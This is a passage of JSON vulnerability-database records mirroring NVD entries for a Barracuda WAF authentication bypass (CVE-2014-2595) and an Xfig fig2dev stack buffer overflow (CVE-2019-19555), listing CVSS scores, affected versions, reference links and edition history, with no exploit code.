"073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2019-19555", "bulletinFamily": "NVD", "title": "CVE-2019-19555", "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "published": "2019-12-04T17:16:00", "modified": "2020-01-22T00:15:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "reporter": "cve@mitre.org", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://sourceforge.net/p/mcj/tickets/55/"], "cvelist": ["CVE-2019-19555"], "type": "cve", "lastseen": "2021-04-23T00:45:21", "history": [{"bulletin": {"affectedSoftware": [{"name": "xfig_project xfig", "operator": "eq", "version": "3.2.7"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:xfig_project:xfig:3.2.7"], "cpe23": ["cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*"], "cvelist": ["CVE-2019-19555"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-787"], "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-01-22T13:26:04", "references": [{"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073"], "type": "openvas"}, {"idList": ["DEBIAN_DLA-2073.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-01-22T13:26:04", "rev": 2, "value": 5.3, "vector": "NONE"}}, "hash": "1ca8372adf09daee38fd7597bd1259fe8a596f1c7c829d794268cc1b7e6eaa2d", "hashmap": [{"hash": "1b514035a75b1f559b336d5877d7be93", "key": "title"}, {"hash": "741b18e744e3f37108cd8c3f4a1c6ef7", "key": "cvss"}, {"hash": "fdc6f4e03b1cb52ddb0c8dd49d1a3437", "key": "cpe23"}, {"hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c", "key": "href"}, {"hash": "a3758f6c88f67e8fd97adefedf156fe4", "key": "affectedSoftware"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "06f1ae8c70abb39845d59205d1df5912", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d10e76d3853397f17c31d3c17ce9d5ce", "key": "references"}, {"hash": "7a8755985f3b17f20c3737a1bcc1a594", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "64b909f3d286622fc28c06aab6e57b85", "key": "cvelist"}, {"hash": "2b757f4f7f06b55436c2a9d7065b3fa2", "key": "cpe"}, {"hash": "9774a97785c6561b193cd00198cb4751", "key": "cvss2"}, {"hash": "dd19f97313fb8a659f37bbceb9367f85", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "id": "CVE-2019-19555", "lastseen": "2020-01-22T13:26:04", "modified": "2020-01-22T00:15:00", "objectVersion": "1.3", "published": "2019-12-04T17:16:00", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://sourceforge.net/p/mcj/tickets/55/"], "reporter": "cve@mitre.org", "title": "CVE-2019-19555", "type": "cve", "viewCount": 1}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 3, "lastseen": "2020-01-22T13:26:04"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "xfig_project:xfig", "name": "xfig project xfig", "operator": "eq", "version": "3.2.7"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:xfig_project:xfig:3.2.7"], "cpe23": ["cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-19555"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "cwe": ["CWE-787"], "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:57", "references": [{"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073"], "type": "openvas"}, {"idList": ["DEBIAN_DLA-2073.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-02-02T07:12:57", "rev": 2, "value": 5.3, "vector": "NONE"}}, "extraReferences": [{"name": "[debian-lts-announce] 20200121 [SECURITY] [DLA 2073-1] transfig security update", "refsource": "MLIST", "tags": [], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html"}, {"name": "https://sourceforge.net/p/mcj/tickets/55/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://sourceforge.net/p/mcj/tickets/55/"}], "hash": "2415e42ca0f5e245bf5fd626d6dff6ec78330d60e85be5c624040d5c6ff18d68", "hashmap": [{"hash": "1b514035a75b1f559b336d5877d7be93", "key": "title"}, {"hash": "741b18e744e3f37108cd8c3f4a1c6ef7", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "fdc6f4e03b1cb52ddb0c8dd49d1a3437", "key": "cpe23"}, {"hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7961decc7da42dc4f6270028d71fd6c9", "key": "extraReferences"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "06f1ae8c70abb39845d59205d1df5912", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6665261d21bcd40865112d42d3aebd0a", "key": "cpeConfiguration"}, {"hash": "d10e76d3853397f17c31d3c17ce9d5ce", "key": "references"}, {"hash": "7a8755985f3b17f20c3737a1bcc1a594", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "64b909f3d286622fc28c06aab6e57b85", "key": "cvelist"}, {"hash": "2b757f4f7f06b55436c2a9d7065b3fa2", "key": "cpe"}, {"hash": "9774a97785c6561b193cd00198cb4751", "key": "cvss2"}, {"hash": "dd19f97313fb8a659f37bbceb9367f85", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a21e5a3ad7af4afdf96adb8ba3fd285e", "key": "cvss3"}, {"hash": "2935cd312095139d8053e3448cdf3bf3", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "id": "CVE-2019-19555", "immutableFields": [], "lastseen": "2021-02-02T07:12:57", "modified": "2020-01-22T00:15:00", "objectVersion": "1.5", "published": "2019-12-04T17:16:00", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://sourceforge.net/p/mcj/tickets/55/"], "reporter": "cve@mitre.org", "title": "CVE-2019-19555", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T07:12:57"}, {"bulletin": {"affectedSoftware": [{"name": "xfig_project xfig", "operator": "eq", "version": "3.2.7"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:xfig_project:xfig:3.2.7"], "cpe23": ["cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*"], "cvelist": ["CVE-2019-19555"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-787"], "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-12-11T15:13:27", "references": []}, "score": {"modified": "2019-12-11T15:13:27", "value": 3.6, "vector": "NONE"}}, "hash": "ef141bd0fbffc1218178806b7337f91dadbad57641c94bc74c34ce2723c13d98", "hashmap": [{"hash": "1b514035a75b1f559b336d5877d7be93", "key": "title"}, {"hash": "741b18e744e3f37108cd8c3f4a1c6ef7", "key": "cvss"}, {"hash": "fdc6f4e03b1cb52ddb0c8dd49d1a3437", "key": "cpe23"}, {"hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c", "key": "href"}, {"hash": "f76e912d5308fa8bf536d6509f67faef", "key": "modified"}, {"hash": "a3758f6c88f67e8fd97adefedf156fe4", "key": "affectedSoftware"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "06f1ae8c70abb39845d59205d1df5912", "key": "published"}, {"hash": "98bc76da9c20c2447181e2816409f10a", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "64b909f3d286622fc28c06aab6e57b85", "key": "cvelist"}, {"hash": "2b757f4f7f06b55436c2a9d7065b3fa2", "key": "cpe"}, {"hash": "9774a97785c6561b193cd00198cb4751", "key": "cvss2"}, {"hash": "dd19f97313fb8a659f37bbceb9367f85", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "id": "CVE-2019-19555", "lastseen": "2019-12-11T15:13:27", "modified": "2019-12-10T17:17:00", "objectVersion": "1.3", "published": "2019-12-04T17:16:00", "references": ["https://sourceforge.net/p/mcj/tickets/55/"], "reporter": "cve@mitre.org", "title": "CVE-2019-19555", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2019-12-11T15:13:27"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "xfig_project:xfig", "name": "xfig project xfig", "operator": "eq", "version": "3.2.7"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:xfig_project:xfig:3.2.7"], "cpe23": ["cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2019-19555"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "cwe": ["CWE-787"], "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:54:33", "references": [{"idList": ["DEBIAN:DLA-2073-1:017FC"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310892073"], "type": "openvas"}, {"idList": ["DEBIAN_DLA-2073.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-09-21T14:54:33", "rev": 2, "value": 5.3, "vector": "NONE"}}, "hash": "abb5d174f666a47d83327ba26fbe688a6777d63d466c90cc8d3477bf8a3ff5c1", "hashmap": [{"hash": "1b514035a75b1f559b336d5877d7be93", "key": "title"}, {"hash": "741b18e744e3f37108cd8c3f4a1c6ef7", "key": "cvss"}, {"hash": "fdc6f4e03b1cb52ddb0c8dd49d1a3437", "key": "cpe23"}, {"hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "06f1ae8c70abb39845d59205d1df5912", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d10e76d3853397f17c31d3c17ce9d5ce", "key": "references"}, {"hash": "7a8755985f3b17f20c3737a1bcc1a594", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "64b909f3d286622fc28c06aab6e57b85", "key": "cvelist"}, {"hash": "2b757f4f7f06b55436c2a9d7065b3fa2", "key": "cpe"}, {"hash": "9774a97785c6561b193cd00198cb4751", "key": "cvss2"}, {"hash": "dd19f97313fb8a659f37bbceb9367f85", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a21e5a3ad7af4afdf96adb8ba3fd285e", "key": "cvss3"}, {"hash": "2935cd312095139d8053e3448cdf3bf3", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "id": "CVE-2019-19555", "lastseen": "2020-09-21T14:54:33", "modified": "2020-01-22T00:15:00", "objectVersion": "1.3", "published": "2019-12-04T17:16:00", "references": ["https://lists.debian.org/debian-lts-announce/2020/01/msg00018.html", "https://sourceforge.net/p/mcj/tickets/55/"], "reporter": "cve@mitre.org", "title": "CVE-2019-19555", "type": "cve", "viewCount": 1}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:54:33"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-19555"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-12-07T11:53:52", "references": []}, "score": {"modified": "2019-12-07T11:53:52", "value": 3.6, "vector": "NONE"}}, "hash": "d2c85838ddce1487963b7a54c1aa5d55e7bbb86278cab1859e7932969466d73e", "hashmap": [{"hash": "1b514035a75b1f559b336d5877d7be93", "key": "title"}, {"hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c", "key": "href"}, {"hash": "06f1ae8c70abb39845d59205d1df5912", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "98bc76da9c20c2447181e2816409f10a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "64b909f3d286622fc28c06aab6e57b85", "key": "cvelist"}, {"hash": "ae102fb16fc1d2dd3ab5cb89e5555269", "key": "modified"}, {"hash": "dd19f97313fb8a659f37bbceb9367f85", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19555", "id": "CVE-2019-19555", "lastseen": "2019-12-07T11:53:52", "modified": "2019-12-04T19:04:00", "objectVersion": "1.3", "published": "2019-12-04T17:16:00", "references": ["https://sourceforge.net/p/mcj/tickets/55/"], "reporter": "cve@mitre.org", "title": "CVE-2019-19555", "type": "cve", "viewCount": 0}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 1, "lastseen": "2019-12-07T11:53:52"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2935cd312095139d8053e3448cdf3bf3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "2b757f4f7f06b55436c2a9d7065b3fa2"}, {"key": "cpe23", "hash": "fdc6f4e03b1cb52ddb0c8dd49d1a3437"}, {"key": "cpeConfiguration", "hash": "fe91452de4013c9cb7e8e8ce4fe92840"}, {"key": "cvelist", "hash": "64b909f3d286622fc28c06aab6e57b85"}, {"key": "cvss", "hash": "741b18e744e3f37108cd8c3f4a1c6ef7"}, {"key": "cvss2", "hash": "9774a97785c6561b193cd00198cb4751"}, {"key": "cvss3", "hash": "a21e5a3ad7af4afdf96adb8ba3fd285e"}, {"key": "cwe", "hash": "661a69d232e07fc7aadb258325e71df8"}, {"key": "description", "hash": "dd19f97313fb8a659f37bbceb9367f85"}, {"key": "extraReferences", "hash": "7961decc7da42dc4f6270028d71fd6c9"}, {"key": "href", "hash": "a06c29df9d9d1b5dc70c7eeb898f1c0c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "7a8755985f3b17f20c3737a1bcc1a594"}, {"key": "published", "hash": "06f1ae8c70abb39845d59205d1df5912"}, {"key": "references", "hash": "d10e76d3853397f17c31d3c17ce9d5ce"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "1b514035a75b1f559b336d5877d7be93"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ed5c7e2a61b4903a9563a752316aced0804ed0cf87e0fe5a4ba6336163c792d8", "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2019-19555"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-19555"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "nessus", "idList": ["OPENSUSE-2021-1143.NASL", "SUSE_SU-2021-2454-1.NASL", "OPENSUSE-2021-2454.NASL", "SUSE_SU-2021-3124-1.NASL", "OPENSUSE-2021-1318.NASL", "DEBIAN_DLA-2073.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2021:1143-1"]}], "modified": "2021-04-23T00:45:21", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-04-23T00:45:21", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:xfig_project:xfig:3.2.7"], "affectedSoftware": [{"cpeName": "xfig_project:xfig", "name": "xfig project xfig", "operator": "eq", "version": "3.2.7"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*"], "cwe": ["CWE-787"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:xfig_project:xfig:3.2.7:b:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "[debian-lts-announce] 